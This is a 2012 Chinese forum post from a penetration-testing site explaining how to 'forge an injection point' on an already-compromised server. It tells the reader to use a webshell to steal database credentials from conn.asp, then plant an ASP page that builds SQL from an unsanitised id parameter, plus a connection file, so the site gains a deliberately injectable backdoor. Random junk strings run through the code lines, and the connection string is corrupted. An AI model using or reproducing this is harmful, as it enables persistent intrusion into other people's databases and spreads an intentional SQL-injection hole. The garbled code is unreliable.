中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:) J& Q  h# L3 d! Y
ASP/Visual Basic代码
7 z0 R. U) Y. u<!--#include file="xx.asp"-->   
- q/ K5 K  ]; U3 o/ I, n7 w" i<%   
/ O) j2 m7 B& s. c& ]set rs=server.createobject("ADODB.recordset")    / d( Q# z5 R3 Q2 ~7 f
id = request("id")    - m4 P+ v9 t% S4 O; N1 ^
strSQL = "select * from admin where id=" & id    ' T. @2 t& S2 ^. W( K; s% `
rs.open strSQL,conn,1,3   
/ }7 g7 ]% ~9 ~% ers.close    ! k9 @$ v' Y* l! D5 ~; ^- E- N% F3 K
%>  . Y. H7 k7 @3 t* V  O* j
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!2 ~( S+ n1 h. _" i1 k' _. _
然后就要构造一个连接数据库的文件了,代码如下:
5 A# _. n9 z, q8 dASP/Visual Basic代码
/ T0 i3 R/ W4 {$ J* z<%            7 V$ |3 z6 }6 |. n+ V8 q6 k" i
strSQLServerName = "000.000.000.000"     '服务器名称或地址   
+ L& H% G* v9 G( h  ZstrSQLDBUserName = "sqlname"         '数据库帐号    9 d& |4 V5 n" x( q$ l
strSQLDBPassword = "sqlpass"         '数据库密码   
' s. u1 ]- S. J$ S+ ?- O3 ustrSQLDBName = "sqldataname"           '数据库名称   
. T1 P2 z: \5 ]+ wSet conn = Server.CreateObject("ADODB.Connection")   
  Q/ ~8 w7 L( u+ b- M  `$ HstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   * u! M, Y3 b: {1 h7 X
conn.open strCon    . q5 s. F0 R! A! P5 b0 v. G
%>  5 C6 \# w  P" Z8 i) _/ R
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
6 D, Q2 x, |" H. D2 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2